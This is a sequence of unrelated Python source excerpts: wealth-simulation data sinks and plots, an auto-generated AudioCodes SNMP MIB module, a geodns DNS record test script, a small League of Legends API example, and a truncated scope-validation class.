self.boost = np.zeros((self.n_tick, self.n_store), float)
self.alive = np.zeros((self.n_tick, self.n_store), bool)
self.direct_amount = np.zeros((self.n_tick, self.n_store), float)
self.trust_amount = np.zeros((self.n_tick, self.n_store), float)
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
n_write = len(age)
if n_write > self.n_store:
# Need more memory
n_new = int(0.5 * self.n_agent_0)
for attr in ('age', 'female', 'skill', 'wealth', 'partner',
'coupling', 'uncoupling', 'mother', 'father',
'savings', 'interest', 'dying', 'have_baby',
'boost', 'alive', 'direct_amount', 'trust_amount'):
old = getattr(self, attr)
extra = np.zeros((self.n_tick, n_new), dtype=old.dtype)
new = np.hstack((old, extra))
setattr(self, attr, new)
self.n_store += n_new
self.age[tick, :n_write] = age
self.female[tick, :n_write] = female
self.skill[tick, :n_write] = skill
self.wealth[tick, :n_write] = wealth
self.partner[tick, :n_write] = partner
self.coupling[tick, :n_write] = coupling
self.uncoupling[tick, :n_write] = uncoupling
self.mother[tick, :n_write] = parents[:, 0]
self.father[tick, :n_write] = parents[:, 1]
self.savings[tick, :n_write] = savings
self.interest[tick, :n_write] = interest
self.dying[tick, :n_write] = dying
self.have_baby[tick, :n_write] = have_baby
self.boost[tick, :n_write] = boost
self.alive[tick, :n_write] = alive
self.direct_amount[tick, :n_write] = direct_amount
self.trust_amount[tick, :n_write] = trust_amount
def flush(self):
sink = self._store
# Trim to correct size
n_agent = np.where(self.alive.sum(axis=0) > 0)[0][-1]
for attr in ('age', 'female', 'skill', 'wealth', 'partner',
'coupling', 'uncoupling', 'mother', 'father',
'savings', 'interest', 'dying', 'have_baby',
'boost', 'alive', 'direct_amount', 'trust_amount'):
old = getattr(self, attr)
new = old[:, :n_agent]
setattr(self, attr, new)
ticks = pd.Series(list(range(self.n_tick)), name='tick')
ticks_by_agents = np.outer(ticks.values, np.ones(n_agent, int))
agents_by_agents = np.outer(np.ones(len(ticks), int), np.arange(n_agent, dtype=int))
history = pd.DataFrame({
'tick': ticks_by_agents.ravel(),
'agent': agents_by_agents.ravel(),
'age': self.age.ravel(),
'female': self.female.ravel(),
'skill': self.skill.ravel(),
'wealth': self.wealth.ravel(),
'partner': self.partner.ravel(),
'coupling': self.coupling.ravel(),
'uncoupling': self.uncoupling.ravel(),
'mother': self.mother.ravel(),
'father': self.father.ravel(),
'savings': self.savings.ravel(),
'interest': self.interest.ravel(),
'dying': self.dying.ravel(),
'have_baby': self.have_baby.ravel(),
'boost': self.boost.ravel(),
'alive': self.alive.ravel(),
'direct_amount': self.direct_amount.ravel(),
'trust_amount': self.trust_amount.ravel(),
})
history = history[['tick', 'agent', 'age', 'female', 'skill',
'wealth', 'partner', 'coupling', 'uncoupling',
'mother', 'father', 'savings',
'interest', 'dying', 'have_baby', 'boost',
'alive', 'direct_amount', 'trust_amount']]
sink.write('history', history, reset_index=False)
class TrustsSink(Sink):
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
self.n_tick = int(ctx.ctrl.ticks)
self.n_agent_0 = int(ctx.ctrl.agents)
self.n_store = 2 * self.n_agent_0 # Allow two trusts per initial agent
self.amount = np.zeros((self.n_tick, self.n_store), float)
self.initial = np.zeros((self.n_tick, self.n_store), float)
self.generations = np.zeros((self.n_tick, self.n_store), int)
self.ancestor = np.zeros((self.n_tick, self.n_store), int)
self.active = np.zeros((self.n_tick, self.n_store), bool)
self.n_write = 0
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
n_write = len(trusts['amount'])
if n_write > self.n_store:
# Need more memory
n_new = int(0.5 * self.n_agent_0)
for attr in ('amount', 'initial', 'generations', 'ancestor', 'active'):
old = getattr(self, attr)
extra = np.zeros((self.n_tick, n_new), dtype=old.dtype)
new = np.hstack((old, extra))
setattr(self, attr, new)
self.n_store += n_new
self.amount[tick, :n_write] = trusts['amount']
self.initial[tick, :n_write] = trusts['initial']
self.generations[tick, :n_write] = trusts['generations']
self.ancestor[tick, :n_write] = trusts['ancestor']
self.active[tick, :n_write] = trusts['active']
self.n_write = n_write
def flush(self):
sink = self._store
# Trim to correct size
for attr in ('amount', 'initial', 'generations', 'ancestor', 'active'):
old = getattr(self, attr)
new = old[:, :self.n_write]
setattr(self, attr, new)
ticks = pd.Series(list(range(self.n_tick)), name='tick')
ticks_by_trusts = np.outer(ticks.values, np.ones(self.n_write, int))
trusts_by_trusts = np.outer(np.ones(len(ticks), int), np.arange(self.n_write, dtype=int))
trusts = pd.DataFrame({
'tick': ticks_by_trusts.ravel(),
'trust': trusts_by_trusts.ravel(),
'amount': self.amount.ravel(),
'initial': self.initial.ravel(),
'generations': self.generations.ravel(),
'ancestor': self.ancestor.ravel(),
'active': self.active.ravel(),
})
trusts = trusts[['tick', 'trust', 'amount', 'initial', 'generations',
'ancestor', 'active']]
sink.write('trusts', trusts, reset_index=False)
def plot_history(data, agent, agent_numbers=True):
if isinstance(data, str):
data = pd.HDFStore(os.path.join(data, 'output', 'output.h5'))
history = data.history
life = history[history.agent == agent].set_index('tick')
life.index = 2016 + life.index
plt.figure(figsize=(10, 5))
plt.axes(position=[0.08, 0.1, 0.90, 0.87])
ymax = 1.05*life.wealth.max() / 1000.0
ymax = ymax if ymax > 0 else 1.0
plt.fill_between(life.index, 0, ymax, color='black', alpha=0.2, where=(life.dying | ~life.alive))
partner_list = np.unique(life.partner[(life.partner >= 0) & life.alive])
# Babies will be added to with partner(s)'s babies
baby_series = life.have_baby.copy()
for partner in partner_list:
in_relationship = (life.partner == partner).values
partner_life = history[history.agent == partner].set_index('tick')
partner_life.index = 2016 + partner_life.index
baby_series = baby_series | (in_relationship & partner_life.have_baby)
# Extend out a year to include the final months of the relationship
in_relationship[1:] = (~partner_life.dying[:-1] & in_relationship[:-1]) | in_relationship[1:]
in_relationship = in_relationship & (life.alive | life.dying)
plt.fill_between(life.index, 0, ymax, color='magenta', alpha=0.1, where=in_relationship)
for coupling in life.index[life.coupling]:
plt.plot([coupling, coupling], [0, ymax], color='red', linestyle=':', linewidth=1.5)
label = 'partner'
if agent_numbers:
number = life.partner.loc[coupling]
number = number if number >= 0 else '?'
label = '{} ({})'.format(label, number)
plt.text(coupling+0.3, 0.85*ymax, label, rotation=90, color='red')
for uncoupling in life.index[life.uncoupling]:
plt.plot([uncoupling, uncoupling], [0, ymax], color='red', linestyle=':', linewidth=1.5)
label = 'separated'
if agent_numbers:
number = life.partner.loc[uncoupling] if uncoupling > 0 else -1
number = number if number >= 0 else '?'
label = '{} ({})'.format(label, number)
plt.text(uncoupling+0.3, 0.85*ymax, label, rotation=90, color='red')
for have_baby in life.index[baby_series]:
plt.plot([have_baby, have_baby], [0, ymax], color='green', linestyle='--', linewidth=1.5)
label = 'baby'
if agent_numbers:
baby = history.agent[
((history.mother == agent) | (history.father == agent)) &
(history.age == 0) & history.alive &
(history.tick == (have_baby-life.index[0]))].iloc[0]
label = '{} ({})'.format(label, baby)
plt.text(have_baby+0.3, 0.4*ymax, label, rotation=90, color='green')
plt.plot(life.wealth[life.alive & ~life.dying] / 1000.0, linewidth=2.0, alpha=0.7)
plt.xlim(life.index[0], life.index[-1])
plt.ylim(0, ymax)
plt.text(1+life.index[life.alive][0], 0.03*ymax, 'Age:')
for age in range(10, 200, 10):
this_age = (life.age == age)
if np.any(this_age):
year = life.index[this_age][0]
tick = year - life.index[0]
if tick >= 8:
plt.text(year, 0.03*ymax, age, ha='center')
plt.plot([year, year], [0, 0.022*ymax], color='black')
label = 'Female' if np.any(life.female) else 'Male'
if agent_numbers:
label = '{}: {}'.format(agent, label)
plt.text(2+life.index[0], 0.95*ymax, label)
plt.xlabel('Year')
plt.ylabel(u'Total wealth (£1000s)')
plt.show()
def get_history(data, agent):
if isinstance(data, str):
data = pd.HDFStore(os.path.join(data, 'output', 'output.h5'))
events = []
history = data.history
life = history[history.agent == agent].set_index('tick')
mother = life.mother[life.alive].max()
father = life.father[life.alive].max()
born = (life.age == 0) & life.alive
if np.any(born):
tick = np.where(born)[0][0]
events.append([tick, 'born', None])
else:
tick = 0
events.append([tick, 'initial age', life.age.loc[0]])
events.append([tick, 'mother', mother])
events.append([tick, 'father', father])
if np.any(life.dying):
events.append([np.where(life.dying)[0][0], 'died', None])
if np.any(life.coupling):
for t in np.where(life.coupling)[0]:
if life.uncoupling.loc[t]:
# Damn, that was too fast to record
events.append([t, 'coupled', None])
else:
events.append([t, 'coupled', life.partner.loc[t]])
if life.alive.loc[0] and (life.partner.loc[0] >= 0) and not life.coupling.loc[0]:
events.append([0, 'initial partner', life.partner.loc[0]])
if np.any(life.uncoupling):
for t in np.where(life.uncoupling)[0]:
if life.coupling.loc[t]:
# Too fast
events.append([t, 'uncoupled', None])
else:
events.append([t, 'uncoupled', life.partner.loc[t-1]])
babies = life.have_baby
widows = pd.Series(np.zeros(len(life)))
for partner in life.partner[(life.partner >= 0) & life.alive].unique():
partner_life = history[(history.agent == partner) & (history.partner == agent)].set_index('tick')
babies[partner_life.index] += partner_life.have_baby.values
widows[partner_life.index] += partner_life.dying.values
for tick in np.where(babies.values)[0]:
baby = history.agent[((history.mother == agent) | (history.father == agent)) &
(history.age == 0) & history.alive & (history.tick == tick)].iloc[0]
events.append([tick, 'baby', baby])
for tick in np.where(widows.values)[0]:
events.append([tick, 'widowed', None])
for child in history.agent[((history.mother == agent) | (history.father == agent)) &
(history.age > 0) & (history.tick == 0)].values:
events.append([0, 'existing child', child])
return sorted(events, key=lambda x: x[0])
def generation_correlation(result, age, measure):
agent = result.history[(result.history.age == age) & (result.history.tick > (result.history.tick.max()-10)) & result.history.alive & ~result.history.dying].agent.values
measure = result.history[(result.history.age == age) & result.history.alive & ~result.history.dying].set_index('agent')[measure]
tree = result.tree[result.tree.descendant.isin(agent) & result.tree.ancestor.isin(measure.index)]
gencor = []
for generations in range(1, tree.generations.max()+1):
tree_cut = tree[tree.generations == generations]
measure_ancestor = measure.loc[tree_cut.ancestor].groupby(tree_cut.descendant.values).mean()
measure_descendant = measure.loc[measure_ancestor.index]
gencor.append(np.corrcoef(measure_ancestor, measure_descendant)[0, 1])
return gencor
|
#
# PySNMP MIB module AcPerfMediaGateway (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AcPerfMediaGateway
# Produced by pysmi-0.3.4 at Wed May 1 11:33:09 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Integer32, Counter32, ObjectIdentity, IpAddress, MibIdentifier, ModuleIdentity, Gauge32, Unsigned32, iso, enterprises, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Integer32", "Counter32", "ObjectIdentity", "IpAddress", "MibIdentifier", "ModuleIdentity", "Gauge32", "Unsigned32", "iso", "enterprises", "TimeTicks")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
audioCodes = MibIdentifier((1, 3, 6, 1, 4, 1, 5003))
acRegistrations = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 7))
acGeneric = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 8))
acProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 9))
acPerformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10))
acPerfMediaGateway = ModuleIdentity((1, 3, 6, 1, 4, 1, 5003, 10, 1))
acPerfMediaGateway.setRevisions(('2003-11-20 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: acPerfMediaGateway.setRevisionsDescriptions(('Version 4.4. November 20, 2003. Made these changes: o Initial revision',))
if mibBuilder.loadTexts: acPerfMediaGateway.setLastUpdated('200407121502Z')
if mibBuilder.loadTexts: acPerfMediaGateway.setOrganization('AudioCodes Ltd')
if mibBuilder.loadTexts: acPerfMediaGateway.setContactInfo('Postal: Support AudioCodes LTD 1 Hayarden Street Airport City Lod, ISRAEL 70151 Tel: 972-3-9764000 Fax: 972-3-9764040 Email: support@audiocodes.com Web: www.audiocodes.com')
if mibBuilder.loadTexts: acPerfMediaGateway.setDescription('This MIB defines the enterprise-specific objects needed to support performance management of the AudioCodes product. Performance measurements are grouped into the following MIB trees: acPerfCp - performance measurements related to the control protocol acPerfRtp - performance measurements related to RTP streams acPerfSystem - performance measurements related to network element as a whole')
acPerfCp = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1))
acPerfCpNumDupsForCompletedTransactions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpNumDupsForCompletedTransactions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpNumDupsForCompletedTransactions.setDescription('The number of times a duplicate transaction request was received after the initial transaction had already been completed. In this case, the gateway resends the response for this transaction. Products: All Capabilities: All')
acPerfCpNumDupsForOutstandingTransactions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpNumDupsForOutstandingTransactions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpNumDupsForOutstandingTransactions.setDescription('The number of times a duplicate transaction request was received while the initial transaction was outstanding, that is, still in progress. In this case, the gateway ignores the duplicate request. Products: All Capabilities: All')
acPerfCpMessageSendSuccesses = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageSendSuccesses.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageSendSuccesses.setDescription("Number of times there was a success in sending a call control (H.248) message. Call control messages are sent using the system's socket library. This counter tracks successes in using the local socket services. It does not track successes in end-to-end message transfer between the gateway and the call agent. Products: All Capabilities: All")
acPerfCpMessageSendErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageSendErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageSendErrors.setDescription("Number of times there was a failure in sending a call control (H.248) message. The message is sent via a datagram using the system's socket library. Normally a failure on a socket send operation would be attributed to an internal system problem. Products: All Capabilities: All")
acPerfCpMessageReceiveSuccesses = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageReceiveSuccesses.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageReceiveSuccesses.setDescription("Number of times there was a success in receiving a call control (H.248) message. Call control messages are received using the system's socket library. This counter tracks successes in using the local socket services. It does not track successes in end-to-end message transfer between the gateway and the call agent. Products: All Capabilities: All")
acPerfCpMessageReceiveErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageReceiveErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageReceiveErrors.setDescription("Number of times there was a failure in receiving a call control ( H.248) message. Call control messages are received using the system's socket library. A failure on the socket receive operation can be attributed to an internal system problem or with the call agent sending a message larger than what is supported by the gateway. Products: All Capabilities: All")
acPerfCpProtocolSyntaxErrors = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpProtocolSyntaxErrors.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpProtocolSyntaxErrors.setDescription('Number of syntax errors detected in incoming call control (H.248) messages. Products: All Capabilities: All')
acPerfCpMessageRetransmissions = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageRetransmissions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageRetransmissions.setDescription('Each time the call engine times out waiting for an acknowledgement it retransmits the control protocol message, unless the number of max retransmissions is exceeded. This counter is incremented each time a message is retransmitted due to a timeout. Products: All Capabilities: All')
acPerfCpMessageMaxRetransmissionsExceeded = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageMaxRetransmissionsExceeded.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageMaxRetransmissionsExceeded.setDescription('Number of times the call control message maximum retransmission count was exceeded. The gateway attempted several times to send a message to the call agent, but each time, an ack was not received. A failure of this type results in a failed call and is usually an indication that subsequent calls will fail. This problem is typically a result of the call agent being down or a result of a network problem. Products: All Capabilities: All')
acPerfCpMessagesFromUntrustedSources = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessagesFromUntrustedSources.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessagesFromUntrustedSources.setDescription('Number of messages received from untrusted sources, that is from network nodes other than the node on which the call agent is running. Products: All Capabilities: All')
acPerfRtp = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2))
acPerfRtpSenderPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSenderPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSenderPackets.setDescription('Total number of RTP packets sent by the system for this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSenderOctets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSenderOctets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSenderOctets.setDescription('Total number of non-header RTP octets sent by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpReceiverPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpReceiverPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpReceiverPackets.setDescription('Total number of RTP packets received by the system for this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpReceiverOctets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpReceiverOctets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpReceiverOctets.setDescription('Total number of non-header RTP octets received by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpRcvrLostPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpRcvrLostPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpRcvrLostPackets.setDescription('Total number of RTP packets lost as observed by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpFailedDueToLackOfResources = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpFailedDueToLackOfResources.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpFailedDueToLackOfResources.setDescription('The number of times a rtp request was rejected due to lack of resources since the last application restart. Products: IPmedia 2000')
acPerfRtpSimplexInSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsTotal.setDescription('Total number of simplex input RTP sessions. A simplex (one-way) session would be used to play an announcement. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexInSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsCurrent.setDescription('Current number of simplex input RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexOutSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsTotal.setDescription('Total number of simplex output RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexOutSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsCurrent.setDescription('Current number of simplex output RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpDuplexSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsTotal.setDescription('Total number of duplex RTP sessions. A duplex (two-way) session would be used for conferencing. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpDuplexSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsCurrent.setDescription('Current number of duplex RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3))
acPerfSystemPacketEndpoints = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfSystemPacketEndpoints.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfSystemPacketEndpoints.setDescription("Number of endpoints reserved for all packet network-related functions (conferencing, plays, etc.). This is an attribute that is derived from the type of hardware and the values of certain config parameters. Currently, its value is fixed after init-time. In the future, it's value might be impacted by configuration of online parameters. That is, its value might increase or decrease over time. For example, in a multi-card system, addition of a board would cause it to increase. Products: All Capabilities: All ")
acPerfSystemPacketEndpointsInUse = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfSystemPacketEndpointsInUse.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfSystemPacketEndpointsInUse.setDescription('Number of endpoints that the call engine is currently using for all packet network-related functions (conferencing, plays, etc.). Products: All Capabilities: All')
mibBuilder.exportSymbols("AcPerfMediaGateway", acPerfCpMessageReceiveSuccesses=acPerfCpMessageReceiveSuccesses, acProducts=acProducts, acPerfRtpDuplexSessionsTotal=acPerfRtpDuplexSessionsTotal, acPerfCpMessageSendErrors=acPerfCpMessageSendErrors, acPerformance=acPerformance, acGeneric=acGeneric, acPerfMediaGateway=acPerfMediaGateway, acPerfRtpRcvrLostPackets=acPerfRtpRcvrLostPackets, acPerfRtpSenderPackets=acPerfRtpSenderPackets, acPerfRtpReceiverOctets=acPerfRtpReceiverOctets, acRegistrations=acRegistrations, acPerfCpNumDupsForCompletedTransactions=acPerfCpNumDupsForCompletedTransactions, acPerfCpMessagesFromUntrustedSources=acPerfCpMessagesFromUntrustedSources, acPerfRtpSimplexOutSessionsTotal=acPerfRtpSimplexOutSessionsTotal, acPerfCpProtocolSyntaxErrors=acPerfCpProtocolSyntaxErrors, acPerfRtpReceiverPackets=acPerfRtpReceiverPackets, acPerfCpMessageSendSuccesses=acPerfCpMessageSendSuccesses, acPerfRtpFailedDueToLackOfResources=acPerfRtpFailedDueToLackOfResources, acPerfCpNumDupsForOutstandingTransactions=acPerfCpNumDupsForOutstandingTransactions, acPerfCpMessageReceiveErrors=acPerfCpMessageReceiveErrors, acPerfRtpDuplexSessionsCurrent=acPerfRtpDuplexSessionsCurrent, acPerfRtpSimplexOutSessionsCurrent=acPerfRtpSimplexOutSessionsCurrent, acPerfRtpSimplexInSessionsTotal=acPerfRtpSimplexInSessionsTotal, PYSNMP_MODULE_ID=acPerfMediaGateway, acPerfCpMessageRetransmissions=acPerfCpMessageRetransmissions, acPerfCpMessageMaxRetransmissionsExceeded=acPerfCpMessageMaxRetransmissionsExceeded, acPerfCp=acPerfCp, acPerfSystem=acPerfSystem, acPerfRtpSenderOctets=acPerfRtpSenderOctets, acPerfRtpSimplexInSessionsCurrent=acPerfRtpSimplexInSessionsCurrent, acPerfRtp=acPerfRtp, acPerfSystemPacketEndpointsInUse=acPerfSystemPacketEndpointsInUse, audioCodes=audioCodes, acPerfSystemPacketEndpoints=acPerfSystemPacketEndpoints)
|
from jumpscale import j
import dns.resolver
import time
def test(geodns_install=False, dnsresolver_install=True, port=3333, tmux=True):
# start geodns instance(this is the main object to be used it is an
# abstraction of the domain object)
prefab = j.tools.prefab.local
geodns = prefab.apps.geodns
if dnsresolver_install:
prefab.core.run('pip install dnspython')
# prefab.core.file_download("http://www.dnspython.org/kits3/1.12.0/dnspython3-1.12.0.tar.gz",
# to="$TMPDIR", overwrite=False, expand=True)
# tarpath = prefab.core.find("$TMPDIR", recursive=True, pattern="*dns*.gz", type='f')[0]
# extracted = prefab.core.file_expand(tarpath, "$TMPDIR")
# prefab.core.run("cd %s && python setup.py" % extracted)
if geodns_install:
geodns.install(reset=True)
geodns.start(port=port, tmux=tmux)
# create a domain(the domain object is used as for specific trasactions
# and is exposed for debugging purposes)
domain_manager = j.clients.domainmanager.get(prefab)
domain = domain_manager.ensure_domain("gig.com", serial=3, ttl=600)
self.logger.info(domain._a_records)
self.logger.info(domain._cname_records)
# add an A record
domain.add_a_record("123.45.123.1", "www")
domain.save()
# test_connection
my_resolver = dns.resolver.Resolver()
my_resolver.nameservers = ['127.0.0.1', '192.168.122.250']
my_resolver.port = port
answer1 = my_resolver.query('www.gig.com')
time.sleep(5)
if 1 == answer1.rrset[0].rdtype and "123.45.123.1" == answer1.rrset[0].to_text():
self.logger.info("add A record Test SUCCESS")
else:
self.logger.info("failure")
# add cname record
domain.add_cname_record("www", "grid")
domain.save()
# test connection
answer2 = my_resolver.query("grid.gig.com", rdtype="cname")
time.sleep(5)
if 5 == answer2.rrset[0].rdtype and "www.gig.com." == answer2.rrset[0].to_text():
self.logger.info("add CNAME record Test SUCCESS")
else:
self.logger.info("failure")
self.logger.info(str(type(answer1)) + str(type(answer2)))
# get A record
a_records = domain.get_a_record()
if a_records == {"www": [["123.45.123.1", 100]]}:
self.logger.info("get A record Test SUCCESS")
# get cname record
cname_records = domain.get_cname_record()
if cname_records == {"grid": "www"}:
self.logger.info("get cname cname_records")
# delete A record
domain.del_a_record("www", full=True)
domain.save()
# test deltion
try:
answer1 = my_resolver.query('www.gig.com')
except Exception as e:
self.logger.info(str(e))
# delete cname record
domain.del_cname_record("grid")
domain.save()
# test deltion
try:
answer1 = my_resolver.query('grid.gig.com')
except Exception as e:
self.logger.info(str(e))
if __name__ == "__main__":
test(geodns_install=False)
|
from blitzcrank import Blitzcrank
b = Blitzcrank("RGAPI-this-doesnt-really-matter","euw1")
champion_id = "222"
champion_name = b.champion.by_id(champion_id)["name"]
item_id = "350"
item_name = b.item.by_id(item_id)["name"]
print(champion_name, item_name)
|
class Scope:
__scope_id = 0
def __init__(self, data=None):
self.__data = data or {}
self.__data['id'] = Scope.__scope_id
Scope.__scope_id += 1
def __get__(attr): return lambda self: self.__data.get(attr)
def __set__(attr):
def _set(self, value):
if self.__data.get(attr) != None:
raise Exception(
f'Não é possível redifinir o valor de \'{attr}\'')
if attr == 'begin' or attr == 'ending':
if not isinstance(value, dict):
raise Exception(
'O valor deve ser do tipo dict e conter os atributos \'line\' e \'column\'.')
elif value.get('line') == None or not isinstance(value.get('line'), int):
raise Exception('Deve haver o atributo inteiro \'line\'')
elif value.get('column') == None or not isinstance(value.get('column'), int):
